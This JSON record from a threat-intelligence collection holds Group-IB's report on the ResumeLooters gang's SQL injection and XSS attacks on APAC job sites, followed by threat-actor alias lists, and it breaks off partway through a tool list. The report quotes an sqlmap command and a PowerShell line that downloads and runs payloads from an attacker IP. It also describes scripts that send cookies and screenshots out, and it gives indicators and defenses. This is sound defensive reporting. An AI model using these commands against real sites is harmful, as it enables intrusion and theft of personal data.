{
	"id": "2a7af2c5-6a42-4b0e-bacd-c7d0f096bcf0",
	"created_at": "2026-04-06T00:14:49.629408Z",
	"updated_at": "2026-04-10T13:11:34.675457Z",
	"deleted_at": null,
	"sha1_hash": "999a215477245a6b91cd3f9263228e9f7018a2a1",
	"title": "ResumeLooters infect websites in APAC | Group-IB Blog",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 765145,
	"plain_text": "Nikita Rostovcev\r\nAPAC Technical Head - ASM, TI \u0026 DRP\r\nDead-end job: ResumeLooters infect websites in APAC through SQL injection and XSS attacks\r\nResumeLooters gang infects websites with XSS scripts and SQL injections to vacuum up job\r\nseekers' personal data and CVs\r\nFebruary 6, 2024 · Threat Intelligence\r\nhttps://www.group-ib.com/blog/resumelooters/\r\nPage 1 of 26\n\nAPAC Personal data Threat Intelligence Web injection\r\nIntroduction\r\nIn November 2023, Group-IB’s Threat Intelligence unit detected a massive malicious campaign\r\ntargeting employment agencies and retail companies primarily located in the APAC region, to\r\nsteal and sell sensitive user data.\r\nThe campaign was attributed to a previously unknown group. Due to the threat actor’s focus on\r\njob search platforms and the theft of resumes, Group-IB dubbed it ResumeLooters. Overall, the\r\nresearchers identified 65 websites compromised by ResumeLooters between November 2023 and\r\nDecember 2023. By using SQL injection attacks against websites, the threat actor attempts to steal\r\nuser databases that may include names, phone numbers, emails, and DOBs, as well as\r\ninformation about job seekers’ experience, employment history, and other sensitive personal\r\ndata. The stolen data is then put up for sale by the threat actor in Telegram channels, identified by\r\nGroup-IB’s Threat Intelligence platform.\r\nGroup-IB researchers also found traces of Cross-Site Scripting (XSS) infection on legitimate job\r\nsearch websites. The scripts were intended to load additional malicious scripts from the associated\r\nmalicious infrastructure and display phishing forms on legitimate resources. 
Based on the file\r\ncreation dates on the attackers’ servers, the earliest attacks trace back to the beginning of 2023.\r\nNotably, this is the second group described by Group-IB in less than 2 months that is conducting\r\nSQL injection attacks against companies in the Asia-Pacific region. In December 2023, Group-IB\r\npublished a report about GambleForce – an SQL injection gang that has carried out over 20\r\nattacks against websites in the region.\r\nJust like GambleForce, ResumeLooters primarily targets the Asia-Pacific – over 70% of known\r\nvictims are located in the region (India, Taiwan, Thailand, Vietnam and other countries, as seen in\r\nFigure 2 below). However, Group-IB also identified compromised companies in Brazil, the USA,\r\nTurkey, Russia, Mexico, Italy, and some other non-APAC countries. Group-IB sent notifications to\r\nthe identified victim companies so they could take all necessary steps to mitigate further damage.\r\nThis blog provides a detailed overview of ResumeLooters’ malicious infrastructure, campaigns,\r\ntools, and TTPs, particularly emphasizing the analysis of the gang’s XSS attacks in line with the\r\nMITRE ATT\u0026CK® framework. This post contains relevant indicators of compromise (IOCs) and\r\nrecommendations for corporate cybersecurity teams on how to better defend against SQL injection\r\nand XSS attacks.\r\nFigure 1. ResumeLooters’ malicious infrastructure\r\nKey Findings\r\nFigure 2. 
Distribution of ResumeLooters’ victims by country and sector\r\nDiscovered by Group-IB, ResumeLooters has been active since early 2023.\r\nBetween November and December 2023, the gang successfully conducted SQL injection and\r\nCross-Site Scripting (XSS) attacks against recruitment and retail websites in the Asia-Pacific region.\r\nThe gang is primarily focused on India (12 victims), Taiwan (10), Thailand (9), and Vietnam\r\n(7).\r\nBy using SQL injections, the group has stolen data from 65 websites. The stolen files contained\r\na total of 2,188,444 rows, of which 510,259 were user data stolen from job search websites.\r\nVarious penetration testing tools have been identified on the group’s malicious servers, including\r\nsqlmap, Acunetix, Beef Framework, X-Ray, Metasploit, ARL (Asset Reconnaissance\r\nLighthouse), and Dirsearch.\r\nThe group’s main initial vector is SQL injection via sqlmap. Another technique observed by\r\nGroup-IB in this campaign was the injection of XSS scripts into legitimate job search websites.\r\nThe analysis of stolen HTML files suggests that the malicious XSS script was executed on at\r\nleast four websites. Some HTML files reveal the presence of XSS script embedded in the HTML\r\ncode. 
The XSS script appears to have been executed on some devices with administrative\r\naccess.\r\nResumeLooters tried inserting XSS scripts into all possible web forms of the targeted websites,\r\nhoping they would display phishing forms to obtain admin credentials.\r\nThe accounts of the attackers and advertisements for the sale of compromised data were\r\ndiscovered in Chinese-speaking hacking-themed Telegram groups.\r\nInfection for profit\r\nInitially, when seeking to identify the specific method the threat actor used to steal the data from\r\nthe websites, we formulated two main hypotheses to test:\r\nInfection of vulnerable legitimate websites with an XSS script\r\nInfection of website administrators through a malicious plugin distributed within a narrow circle\r\nof developers.\r\nThroughout the course of our research, we found several pieces of evidence supporting the first\r\nhypothesis. The attackers’ server, among other pieces of stolen data, stored a file named\r\nAdminJobApprovalGrid.aspx_2023_11_23_02_02_39.html.\r\nFigure 3. Source code of one of the legitimate recruitment sites containing ResumeLooters’ XSS\r\nscript\r\nIn addition, within the root directories of two legitimate sites, jobs[redacted].co and\r\nwork[redacted].com, containing ResumeLooters’ XSS script, we discovered the following pieces of\r\ncode.\r\nThis particular piece of code is a script tag that invokes an external script from the domain 8r[.]ae,\r\nwhich is controlled by cybercriminals and presumably used to store additional malicious scripts.\r\nOn one of the legitimate websites identified by Group-IB (https://jobs[redacted]co/company-detail/248), the attackers created a fake employer profile. 
Within one of the fields in this profile,\r\nResumeLooters were able to inject the XSS script referencing 8r[.]ae, which is also displayed on the\r\nmain page of the site.\r\nFigure 4. Screenshot of a fake company card created by the attackers for distributing malicious\r\nXSS script\r\nThis profile also included a link to admin.cloudnetsafe[.]com, which we believe could be another\r\ndomain associated with the group. However, the website was inaccessible at the time of our research and\r\nwe were not able to retrieve its content.\r\nThe domain appears to be an almost exact copy of the main malicious domain associated with\r\nResumeLooters, admin.cloudnetsofe[.]com, differing by only one letter in the URL.\r\nadmin.cloudnetsofe[.]com hosts some malicious scripts as well as phishing pages intended for\r\ncredential theft. This domain will be analyzed in detail later in the blog.\r\nThe XSS script was also found on some other websites.\r\nMalicious XSS script discovered on jobs[redacted].co and\r\nwork[redacted].com\r\nIn another instance, we identified a fake CV posted by the threat actor containing an injected XSS\r\nscript.\r\nFigure 5.1 Other websites compromised by ResumeLooters contained identical pieces of malicious\r\nXSS script\r\nFigure 6. Fake CV posted by ResumeLooters contained the same injected XSS script (The contents\r\nof the CV were translated into English by Group-IB)\r\nThe presence of this code on these pages does not necessarily imply that it was executed on every\r\ndevice. However, it does indicate the persistence of the attackers and their attempts to inject their\r\nXSS scripts into all possible input fields on the targeted websites. 
Group-IB has also found\r\nevidence that the XSS script was executed on some of the visitors’ devices.\r\nInvestigation into ResumeLooters’ malicious infrastructure and tools\r\n139.180.137[.]107\r\nGroup-IB’s investigation began with the identification of a malicious server at 139.180.137[.]107. On\r\nthis server, we found logs of several penetration testing tools, including sqlmap. According to these\r\nlogs, the attackers focused extensively on attacks targeting employment websites and retail\r\ncompanies. Although the sqlmap commands were not unique, the following commands caught our\r\nattention:\r\npython3 sqlmap.py -r txt/redacted.txt -p employee_id --risk 3 --level 3 --batch -D app -T\r\nAnd its subsequent execution:\r\npowershell.exe -nop -w hidden -c IEX ((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx/KAGctYUci'));I\r\n((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx/iDDHJOuzw/1\r\n((new-object\r\nNet.WebClient).DownloadString('http://139.84.130[.]232:8080/CcrN3QqWOeRx'));\r\nThis sequence suggests that in some cases, ResumeLooters were also attempting to gain shell\r\naccess on the target system to download and execute additional payloads and try to find more data\r\nwhile having full control of the victims’ targeted server. It’s not known if these attempts were\r\nsuccessful.\r\nUpon a detailed examination of the server, additional ports with services were discovered. One of\r\nthem, port 443, hosted the following script at the root of its page:\r\nFigure 7. Scan results for 139.180.137[.]107\r\nThe link in this script downloads the data from sb8[.]co, one of the malicious servers used by\r\nResumeLooters. The root page of this site contains three additional links.\r\nFigure 8. 
Scan results for sb8[.]co\r\nYou can find more details about the intended functions of each of these scripts below.\r\nContent of http://admin.cloudnetsofe[.]com/ (139.180.137[.]107) root page\r\nContent of sb8[.]co root page\r\nOnline.htm\r\nThis JavaScript file is malicious code that loads the jQuery library (jquery3.6.3.js) from\r\nhttps://sb8[.]co. After downloading the library, the script uses the html2canvas library to capture a\r\nscreenshot of the current web page and convert it into a PNG format.\r\nSubsequently, the image is encoded into a data string (Base64) and sent via a POST request to\r\nanother server controlled by the attackers at https://api.qu3[.]cc/?js=sb8[.]co. Along with the\r\nimage, various confidential data is sent, such as the HTML code of the page, data from the local\r\nand session storage of the browser, as well as information about the host, cookies, and\r\nreferrer. It is not known why the threat actor selected such an unconventional method of\r\ntransmitting the data.\r\nBeef Framework\r\nThe root page of the sb8[.]co website also mentions 139.84.168[.]189:3000/jquery.js, which upon\r\nanalysis turned out to be part of the Beef Framework.\r\nBeef (Browser Exploitation Framework) is a penetration testing tool designed for interacting with\r\nweb browsers. This framework is used by penetration testing professionals to analyze browser\r\nvulnerabilities and conduct client-side attacks. Beef provides a wide range of exploits targeting\r\nvulnerabilities in web browsers and their plugins. 
The framework allows an attacker to gain complete control\r\nover the victim’s browser, enabling them to perform various actions on behalf of the user.\r\nResumeLooters utilized the Beef framework to facilitate XSS attacks.\r\nContent of https://sb8[.]co/online.htm\r\nIf.js\r\nFigure 9. Scan results for https://admin.cloudnetsofe[.]com/if.js\r\nif.js is malicious JavaScript code that gathers user information and performs redirects to phishing\r\ncredential collection forms.\r\nThe JavaScript code was designed to display tailored phishing collection forms on websites with\r\nsuccessfully injected XSS scripts, aiming to collect visitors’ credentials. We believe that the\r\ncybercriminals’ main goal was to steal administrators’ credentials. However, no evidence of\r\nsuccessful theft of admin credentials was found.\r\nNonetheless, by successfully executing the XSS script on some devices, ResumeLooters were able\r\nto collect some HTML files from users with admin access by utilizing Online.htm described earlier.\r\nContent of https://admin.cloudnetsofe[.]com/if.js\r\nThe key functions of the if.js script include:\r\nThe script monitors visits to specific websites with injected XSS script and redirects to phishing\r\npages of these sites in case of a match to collect credentials from these sites.\r\nThe script contains a function named “xss,” which creates a hidden iframe with a white\r\nbackground and loads the specified URL into it. This can be used for conducting XSS attacks,\r\nparticularly to display malicious web pages on top of legitimate ones.\r\nThe script sends the current URL and user cookies to an external server\r\n(https://admin.cloudnetsofe[.]com/domainxxdisdiiskshfdsh[.]php) using a POST request.\r\nFigure 10.1 Examples of phishing forms in various languages hosted on\r\nhttps://admin.cloudnetsofe[.]com\r\nThe phishing pages hosted on https://admin[.]cloudnetsofe[.]com follow the same naming pattern:\r\nhttps://admin.cloudnetsofe[.]com/{redacted}/index[.]html\r\nOther tools\r\nThe attackers’ server was hosting other open-source tools such as Metasploit, Dirsearch, and X-Ray. In addition to these well-known pentesting tools, we also discovered self-written scripts\r\ndesigned to connect to targeted websites and parse the available data.\r\nWe have no evidence of how the attackers obtained the necessary session data for data parsing on\r\nthese websites, but using this method the attackers were able to parse data from at least a couple\r\nof job search sites and a delivery site.\r\nA script was also discovered parsing data from a server, which appears to be the backend of one of\r\nthe mobile games, judging by the names of some of the data fields.\r\nFigure 11.1 ResumeLooters’ custom scripts designed for data parsing\r\nFigure 12. Data found within the ResumeLooters’ custom data parser related to an unidentified\r\nvictim in the gaming industry\r\n139.84.168[.]189\r\n139.84.168[.]189 is an IP address that was mentioned earlier and is associated with ResumeLooters’\r\nmalicious activity.\r\nPort 3443\r\nOn port 3443 of this server, the penetration testing framework Acunetix was discovered. 
Acunetix is a\r\ntool used for scanning web applications to identify security vulnerabilities.\r\nFigure 13. Login page to the Acunetix framework found on one of the gang’s servers\r\nPort 3000\r\nOn port 3000, this server hosted another penetration testing framework, Beef Framework, which\r\nwas described earlier.\r\nStolen data\r\nAdditionally, the server controlled by ResumeLooters contained an open directory where\r\ncybercriminals stored the stolen source code pages (HTML), cookies, and additional data about\r\nvictims compromised by using sqlmap. Apparently, the threat actor failed to disable the directory\r\nlisting on a web server, which resulted in the exposure of this information.\r\nIn the collection of HTML files, there were documents revealing administrator access to some of the\r\nwebsites that were injected with XSS scripts. Moreover, some HTML files related to four websites\r\nwhere the threat actor was able to implant malicious XSS scripts contained the injected script in their\r\nsource. This suggests that some of the\r\nXSS scripts were executed on the victim’s side and sent to the attackers’ server.\r\nFigure 14. Opendir on 139.84.168[.]189\r\nPenetration Data Center — 渗透数据中心 — sale of the stolen data\r\nOne of the main goals in any threat research is to understand the ultimate goal and motivation of\r\nthe attackers.\r\nThanks to Group-IB’s Threat Intelligence platform and the analysis of the discovered malicious\r\nserver, we traced Telegram accounts associated with the attackers using the email address\r\nemployed by ResumeLooters in their campaign.\r\nThe attackers have been using at least two Telegram accounts, one of which, as of January 2023,\r\nwas named “渗透数据中心,” translated as “Penetration Data Center” from Simplified Chinese.\r\nFigure 15. 
The history of username changes for 渗透数据中心 on Telegram. Source: Group-IB Threat\r\nIntelligence\r\nFigure 16. Messages from the username with sender ID 1757750719. Source: Group-IB Threat\r\nIntelligence\r\nStarting in the fall of 2023, the attackers began using another account named “万国数据阿力”, which\r\ntranslates to “World Data Ali.”\r\nFigure 17. Messages from the username with sender ID 5833110993. Source: Group-IB Threat\r\nIntelligence\r\nBoth accounts were found to be selling data from recruitment and other websites, and the content\r\nof their posts is identical. Furthermore, both accounts joined groups focused on hacking and\r\npenetration testing.\r\nConclusion\r\nSince the beginning of 2023, ResumeLooters have been able to compromise at least 65 websites.\r\nThe group employs a variety of simple techniques, including SQL injection and XSS. The threat\r\nactor attempted to insert XSS scripts into all available forms, aiming to execute them on the\r\nadministrators’ devices to obtain admin credentials. While the group was able to execute the XSS\r\nscript on some visitors’ devices with administrative access, allowing ResumeLooters to steal the\r\nHTML code of the pages the victims were visiting, Group-IB did not find any confirmation of admin\r\ncredential theft.\r\nResumeLooters is yet another example of how much damage can be done with just a handful of\r\npublicly available tools. These attacks are fueled by poor security as well as inadequate database\r\nand website management practices. Both GambleForce and ResumeLooters employ very\r\nstraightforward attack methods. Their attacks are easily avoidable. 
This newly discovered malicious\r\ncampaign serves as a reminder of the need for organizations to prioritize cybersecurity and stay\r\nvigilant against evolving threats.\r\nAside from the potential exposure of job seekers’ data (including phone numbers, email addresses,\r\nand other personal information), various APT groups could leverage this information for the further\r\ntargeting of specific individuals. For example, the Lazarus group and their infamous DreamJob\r\noperation targeted hundreds of job seekers worldwide with fake job offers designed to steal their\r\npersonal information and login credentials.\r\nWe will continue monitoring the activity of ResumeLooters and will provide updates as they become\r\navailable.\r\nRecommendations\r\nSQL Injection Prevention\r\nUse Parameterized Statements or Prepared Statements:\r\nInstead of concatenating user input directly into SQL queries, use parameterized\r\nstatements or prepared statements provided by your programming language or\r\nframework. This helps to separate user input from SQL code.\r\nInput Validation:\r\nValidate and sanitize user inputs on both the client and server sides. Ensure that inputs\r\nadhere to expected formats and length constraints.\r\nWeb Application Firewalls (WAF):\r\nImplement a WAF that can detect and block SQL injection attempts. WAFs can provide an\r\nadditional layer of defense against various web application attacks.\r\nCross-Site Scripting (XSS) Prevention\r\nInput Validation and Sanitization:\r\nValidate and sanitize user input on both the client and server sides. Input validation\r\nensures that user input adheres to expected formats, while sanitization helps to neutralize\r\npotentially harmful content.\r\nEscape User-Generated Content:\r\nBefore rendering user-generated content, escape special characters to ensure that they\r\nare treated as literal text and not interpreted as code.\r\nEnable Advanced Protection with Group-IB\r\nSQL injections and Cross-Site Scripting (XSS) attacks are among the oldest and most threatening\r\nvulnerabilities to modern web applications. They persistently appear in the OWASP Top 10 – a list of\r\ntop critical web application security risks today. These attacks can have serious consequences,\r\nincluding data theft, data loss, compromised data integrity, denial of service, and even complete\r\nsystem compromise.\r\nGroup-IB’s Penetration Testing services can help you minimize your susceptibility to such attacks.\r\nOur experts work with 40 automated tools, incorporating the latest methods and techniques\r\ncurated by Group-IB Threat Intelligence to pinpoint assets vulnerable to web injection attacks, and\r\nmore.\r\nIn the contemporary cybersecurity landscape, injection attacks are often automated using malicious\r\nbots. Group-IB Fraud Protection solution takes a proactive stance to counter this evolving attack\r\ntechnique. Its AI creates highly accurate user behavior profiles, distinguishing between genuine\r\nuser interactions and activities initiated by a third party, such as a fraudster or a sophisticated bot.\r\nThis enables the identification and blocking of bad bot activity.\r\nWith a range of proactive and reactive technologies and services, choose an effective cyber stack\r\nto protect your business-critical applications with the assistance of Group-IB’s experts.\r\nNetwork Indicators\r\nIPs\r\n139.84.130[.]232\r\n139.84.168[.]189\r\n139.84.62[.]151\r\n173.199.122[.]65\r\n139.180.137[.]107\r\nDomains\r\nRecruit.iimjobs[.]asia\r\nrecruiter.foundit[.]asia\r\nadmin.cloudnetsofe[.]com\r\n8t[.]ae\r\nsb8[.]co\r\nqu3[.]cc\r\nMalicious URLs\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx/iDDHJ\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx/KAGct\r\nhttp://139.84.130[.]232:8080/CcrN3QqWOeRx\r\nhttp://139.180.137[.]107:9932/shell3.exe\r\nMITRE ATT\u0026CK®\r\nTactic | Name-ID | Description\r\nActive Scanning | Vulnerability Scanning: T1595.002 | The ResumeLooters group used the X-Ray and Acunetix vulnerability scanners in order to find and exploit vulnerabilities\r\nActive Scanning | Wordlist Scanning: T1595.003 | The ResumeLooters group used Dirsearch in order to find all available files and directories on the target website\r\nAcquire Infrastructure | Domains: T1583.001 | The ResumeLooters group used different domain names for their malicious purposes\r\nAcquire Infrastructure | Server: T1583.004 | The ResumeLooters group used different servers for their malicious purposes\r\nInitial Access | Drive-by Compromise: T1189 | The ResumeLooters group infected legitimate websites with XSS scripts\r\nE l it P bli F i Th R L t l it d SQL",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.group-ib.com/blog/resumelooters/"
	],
	"report_names": [
		"resumelooters"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "8d1c3575-c954-4e39-8717-8d15ccd4020e",
			"created_at": "2024-01-18T02:02:34.725883Z",
			"updated_at": "2026-04-10T02:00:05.007755Z",
			"deleted_at": null,
			"main_name": "GambleForce",
			"aliases": [],
			"source_name": "ETDA:GambleForce",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"Dirsearch",
				"Tinyproxy",
				"cobeacon",
				"redis-rogue-getshell",
				"sqlmap"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "21a155e6-8952-49d3-b7bb-77f0e7541347",
			"created_at": "2024-03-08T02:02:15.765879Z",
			"updated_at": "2026-04-10T02:00:05.02743Z",
			"deleted_at": null,
			"main_name": "ResumeLooters",
			"aliases": [],
			"source_name": "ETDA:ResumeLooters",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "e55fb744-4fb6-4b73-a326-d4d014d6a3d7",
			"created_at": "2023-12-21T02:00:06.102133Z",
			"updated_at": "2026-04-10T02:00:03.503718Z",
			"deleted_at": null,
			"main_name": "GambleForce",
			"aliases": [],
			"source_name": "MISPGALAXY:GambleForce",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3c7567d8-0cac-4226-a6f7-d049b9abcb46",
			"created_at": "2024-02-22T02:00:03.770807Z",
			"updated_at": "2026-04-10T02:00:03.591198Z",
			"deleted_at": null,
			"main_name": "ResumeLooters",
			"aliases": [],
			"source_name": "MISPGALAXY:ResumeLooters",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
				"Lazarus",
				"LightlessCan",
				"Living off the Land",
				"MATA",
				"MBRkiller",
				"MagicRAT",
				"Manuscrypt",
				"Mimail",
				"Mimikatz",
				"Moudour",
				"Mydoom",
				"Mydoor",
				"Mytob",
				"NACHOCHEESE",
				"NachoCheese",
				"NestEgg",
				"NickelLoader",
				"NineRAT",
				"Novarg",
				"NukeSped",
				"OpBlockBuster",
				"PCRat",
				"PEBBLEDASH",
				"PLANKWALK",
				"POOLRAT",
				"PSLogger",
				"PhanDoor",
				"Plink",
				"PondRAT",
				"PowerBrace",
				"PowerRatankba",
				"PowerShell RAT",
				"PowerSpritz",
				"PowerTask",
				"Preft",
				"ProcDump",
				"Proxysvc",
				"PuTTY Link",
				"QUICKRIDE",
				"QUICKRIDE.POWER",
				"Quickcafe",
				"QuiteRAT",
				"R-C1",
				"ROptimizer",
				"Ratabanka",
				"RatabankaPOS",
				"Ratankba",
				"RatankbaPOS",
				"RawDisk",
				"RedShawl",
				"Rifdoor",
				"Rising Sun",
				"Romeo-CoreOne",
				"RomeoAlfa",
				"RomeoBravo",
				"RomeoCharlie",
				"RomeoCore",
				"RomeoDelta",
				"RomeoEcho",
				"RomeoFoxtrot",
				"RomeoGolf",
				"RomeoHotel",
				"RomeoMike",
				"RomeoNovember",
				"RomeoWhiskey",
				"Romeos",
				"RustBucket",
				"SHADYCAT",
				"SHARPKNOT",
				"SIGFLIP",
				"SIMPLESEA",
				"SLICKSHOES",
				"SORRYBRUTE",
				"SUDDENICON",
				"SUGARLOADER",
				"SheepRAT",
				"SierraAlfa",
				"SierraBravo",
				"SierraCharlie",
				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
